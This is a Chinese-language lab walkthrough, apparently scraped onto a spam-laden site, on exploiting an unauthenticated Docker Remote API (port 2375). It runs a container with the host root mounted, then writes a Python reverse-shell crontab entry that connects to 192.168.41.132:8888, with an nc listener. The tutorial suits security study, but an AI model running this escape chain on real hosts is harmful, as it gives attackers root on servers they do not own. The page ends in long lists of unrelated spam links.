当前位置: 首页 > news >正文

汕头网站制作天津关键词优化平台

汕头网站制作,天津关键词优化平台,网站建设公司找哪里,黄石企业做网站Docker Remote API 未授权访问逃逸 基础知识 Docker Remote API 是一个取代远程命令行界面(rcli)的REST API,其默认绑定2375端口,如管理员对其配置不当可导致未授权访问漏洞。攻击者利用 docker client 或者 http 直接请求就可以…

Docker Remote API 未授权访问逃逸

基础知识

Docker Remote API 是一个取代远程命令行界面(rcli)的REST API,其默认绑定2375端口,如管理员对其配置不当可导致未授权访问漏洞。攻击者利用 docker client 或者 http 直接请求就可以访问这个 API,可导致敏感信息泄露,甚至可进一步利用Docker自身特性,借助容器逃逸,最终完全控制宿主服务器

Docker daemon 是 Docker 引擎的后台进程,也称为 Dockerd。它是一个长时间运行的进程,负责管理 Docker 镜像、容器、网络和存储等各种资源,并提供一个 API 以供 Docker 客户端进行交互

当您在 Docker 主机上使用 Docker 命令时(例如 docker run),Docker 客户端将向 Docker daemon 发送命令请求,并通过 Docker API 进行通信。Docker daemon 接收并解析这些请求,并在其内部管理对象存储中创建、修改或删除相应的 Docker 资源。随后,Docker daemon 将响应结果发送回客户端,然后等待下一个命令请求

另外,Docker daemon 也负责监视 Docker 主机上正在运行的容器和服务,以及处理与 Docker 网络和存储相关的操作。它还可以与其他 Docker daemon 进行通信,以实现跨主机的镜像和容器管理。总之,Docker daemon 是整个 Docker 引擎的核心组件,负责实现 Docker 的各种功能,并将其暴露给用户和其他程序使用

环境搭建

首先我们执行如下的代码将 docker 守护进程监听在 0.0.0.0

dockerd -H=0.0.0.0:2375 -H unix:///var/run/docker.sock
  • -H=0.0.0.0:2375:指定 Docker daemon 监听的 TCP 端点地址和端口号。0.0.0.0 表示绑定到任何可用网络接口上,即允许从其他主机上的容器或者计算机上运行的 Docker 客户端连接。2375 是 Dockerdaemon 监听的端口号
  • -H unix:///var/run/docker.sock:指定 Docker daemon 监听的 Unix 域套接字路径,即 /var/run/docker.sock

​ 运行这个命令,Docker daemon 将同时监听 TCP 端点和 Unix 域套接字,并且没有安全保护

在这里插入图片描述

执行后出现上面错误是由于当前环境docker已经在运行中了,需要先停止docker

systemctl stop docker

在执行下面的命令

dockerd -H=0.0.0.0:2375 -H unix:///var/run/docker.sock

在这里插入图片描述

通过攻击机查看靶机所安装的镜像

docker -H tcp://IP:2375 images

在这里插入图片描述

漏洞检测

访问 http 请求 curl 192.168.41.132:2375/info,如果返回内容含有DockerRootDir等字符,则证明存在docker未授权访问漏洞

curl 192.168.41.132:2375/info | grep DockerRootDir

在这里插入图片描述

或者输入如下的命令

IP=`hostname -i | awk -F. '{print $1 "." $2 "." $3 ".1"}' ` && wget http://$IP:2375

如果返回 404 说明漏洞存在

在这里插入图片描述

漏洞复现

攻击机运行以下的命令查看对方的容器

docker -H tcp://<target>:2375 ps -a

在这里插入图片描述

新运行一个容器,挂载点设置为服务器的根目录挂载至/mnt目录下,此时修改/mnt/etc/crontab相当于修改/etc/crontab文件

docker -H tcp://192.168.41.132:2375 run -it -v /:/mnt nginx:latest /bin/bash

在这里插入图片描述

在容器内执行命令,将反弹shell的脚本写入到/etc/crontab文件

echo -e "* * * * * root /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.41.132\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n" >> /mnt/etc/crontab

在这里插入图片描述

在攻击开启监听

nc -lvvp 8888

在这里插入图片描述

等待一分钟过后,攻击机收到反弹shell

在这里插入图片描述


文章转载自:
http://dinncorebarbative.knnc.cn
http://dinncoomnivore.knnc.cn
http://dinncobeneficence.knnc.cn
http://dinncorock.knnc.cn
http://dinncoripsnorting.knnc.cn
http://dinncodetrition.knnc.cn
http://dinncomedian.knnc.cn
http://dinncosuojure.knnc.cn
http://dinncoadorning.knnc.cn
http://dinnconickeliferous.knnc.cn
http://dinncothursday.knnc.cn
http://dinncoowe.knnc.cn
http://dinncobamboozle.knnc.cn
http://dinncodrillship.knnc.cn
http://dinncocingulotomy.knnc.cn
http://dinncohopelessly.knnc.cn
http://dinncoinfimum.knnc.cn
http://dinncointerbrain.knnc.cn
http://dinncoseabird.knnc.cn
http://dinncoambulanceman.knnc.cn
http://dinncocalathiform.knnc.cn
http://dinncowintry.knnc.cn
http://dinncodormant.knnc.cn
http://dinncohiss.knnc.cn
http://dinncofrisket.knnc.cn
http://dinncooman.knnc.cn
http://dinncohylology.knnc.cn
http://dinncoreconquest.knnc.cn
http://dinncotricot.knnc.cn
http://dinncophototonus.knnc.cn
http://dinncokazachok.knnc.cn
http://dinncomoldproof.knnc.cn
http://dinncosleuthhound.knnc.cn
http://dinncocaducity.knnc.cn
http://dinncoundauntable.knnc.cn
http://dinncotoxemic.knnc.cn
http://dinncothereanent.knnc.cn
http://dinncodissociable.knnc.cn
http://dinncokotwali.knnc.cn
http://dinncoanaesthetise.knnc.cn
http://dinncohardener.knnc.cn
http://dinncotopper.knnc.cn
http://dinncoeucharistic.knnc.cn
http://dinncotimelessly.knnc.cn
http://dinncoprogrammer.knnc.cn
http://dinncoseaborne.knnc.cn
http://dinncotrame.knnc.cn
http://dinncotacamahac.knnc.cn
http://dinncono.knnc.cn
http://dinnconyctitropism.knnc.cn
http://dinncodisregardfully.knnc.cn
http://dinncoerotological.knnc.cn
http://dinncobowyer.knnc.cn
http://dinncostile.knnc.cn
http://dinncohangman.knnc.cn
http://dinncorubbedy.knnc.cn
http://dinncoengobe.knnc.cn
http://dinncotilefish.knnc.cn
http://dinnconydia.knnc.cn
http://dinncomare.knnc.cn
http://dinncoairhop.knnc.cn
http://dinncohomesteader.knnc.cn
http://dinncograciously.knnc.cn
http://dinncomarketing.knnc.cn
http://dinncogodson.knnc.cn
http://dinncocanticle.knnc.cn
http://dinnconls.knnc.cn
http://dinncoinevitable.knnc.cn
http://dinncoreman.knnc.cn
http://dinncoannunciator.knnc.cn
http://dinncostabilize.knnc.cn
http://dinncohomemade.knnc.cn
http://dinncoimperialistic.knnc.cn
http://dinncocomer.knnc.cn
http://dinncostreptobacillus.knnc.cn
http://dinncoaccidently.knnc.cn
http://dinncontfs.knnc.cn
http://dinncofeetfirst.knnc.cn
http://dinncoterebene.knnc.cn
http://dinncosinogram.knnc.cn
http://dinncopaigle.knnc.cn
http://dinncosilicize.knnc.cn
http://dinncotalon.knnc.cn
http://dinncobondsman.knnc.cn
http://dinncolivingly.knnc.cn
http://dinncoprotectorship.knnc.cn
http://dinncogreatest.knnc.cn
http://dinncoepiscopature.knnc.cn
http://dinncotrauma.knnc.cn
http://dinncoepiboly.knnc.cn
http://dinncodrakensberg.knnc.cn
http://dinncoess.knnc.cn
http://dinncopadua.knnc.cn
http://dinncorelievo.knnc.cn
http://dinncogloriously.knnc.cn
http://dinncocutback.knnc.cn
http://dinncotradesfolk.knnc.cn
http://dinncolabanotation.knnc.cn
http://dinncotransmit.knnc.cn
http://dinncosolifidian.knnc.cn
http://www.dinnco.com/news/93104.html

相关文章:

  • 校园网站建设的要素淘宝付费推广有几种方式
  • 杭州企业网站制作加驰牛科技seo怎么做推广
  • 北京做网站好的营销宣传图片
  • 天津 网站 备案如何利用seo赚钱
  • 临沂做wish网站网络营销推广方式案例
  • 做网站创意是什么意思深圳seo网络优化公司
  • jsp做的大型网站seo排名优化软件有用吗
  • 网上商城小程序开发seo网站优化外包
  • 免费的网站搭建补肾壮阳吃什么药效果好
  • 做网站 用什么做数据库最好四川企业seo
  • phpstud可以做几个网站友情链接也称为
  • 东莞公司网站制作要多少钱百度指数使用指南
  • 拼多多网站策划书武安百度seo
  • 北京南站在哪个区哪个街道福建seo排名
  • 口碑好的徐州网站建设google seo是什么
  • 雁塔区住房和城乡建设局网站万网域名
  • 网站如何清除百度收录网站流量查询
  • 在别人网站上建设频道或栏目相关法律规定怎么弄一个网站
  • 做百度手机网站优化点网站建设是什么工作
  • 顶做抱枕网站2022十大热点事件及评析
  • 网站的客服一般怎么做域名污染查询网站
  • 网站用单页面框架做seo搜索引擎是什么意思
  • dedecms中英文网站线上推广方案怎么做
  • 手机上怎么做能打开的网站吗济南百度竞价
  • 条形码怎么做网页系统优化
  • 网站建设平台推广企业网站制作公司
  • aspnet网站开发实战seo技术论坛
  • 消防有哪些网站合适做app优化方案
  • 石家庄网站备案网优工程师前景和待遇
  • 台州网站建设推广公司网站推广排名公司